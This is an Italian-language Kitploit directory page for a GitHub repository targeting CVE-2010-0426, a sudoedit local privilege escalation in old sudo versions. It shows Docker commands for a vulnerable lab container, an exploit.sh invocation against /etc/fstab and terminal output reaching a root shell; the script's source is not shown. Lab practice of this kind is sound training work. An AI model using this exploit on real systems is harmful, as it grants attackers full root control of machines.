Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalation dei privilegi locale e contenitore vulnerabile | Kitploit
Strumenti/GitHubGitHub/t0kx/privesc-cve-2010-0426
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalation dei privilegi locale e contenitore vulnerabile

Vedi Repository
111348 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sudo 1.6.x<=1.6.9p21 e 1.7.x<=1.7.2p4 Escalation Locale dei Privilegi

Sudo (su "do") consente a un amministratore di sistema di dare a determinati utenti (o gruppi di utenti) la possibilità di eseguire alcuni (o tutti) i comandi come root, registrando tutti i comandi e gli argomenti.

Ambiente vulnerabile

Per configurare un ambiente vulnerabile per il tuo test avrai bisogno di Docker installato e dovrai eseguire il seguente comando:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

E avvierà una shell interattiva con privilegi utente limitati.

Codice vulnerabile

Il bug è stato trovato in sudoedit, che non gestisce correttamente il comando 'sudoedit'; ciò consente a un utente malintenzionato di sostituire il vero comando sudoedit con un comando arbitrario.

Attaccanti locali potrebbero sfruttare questo problema per eseguire comandi arbitrari come utente 'root'. Sfruttamenti riusciti possono compromettere completamente un computer interessato.

Exploit

Per sfruttare questo target esegui semplicemente:

root@kitploit:~
./exploit.sh

Se stai usando questa immagine vulnerabile, puoi semplicemente eseguire:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Crediti

Questa falla è stata trovata da Slouching.

Disclaimer

Questo o il programma precedente è SOLO a scopo didattico. Non usarlo senza permesso. Vale il solito disclaimer, in particolare il fatto che io (t0kx) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet non si assume NESSUNA responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Usando questi programmi accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è responsabilità di t0kx.

Scarica lo strumento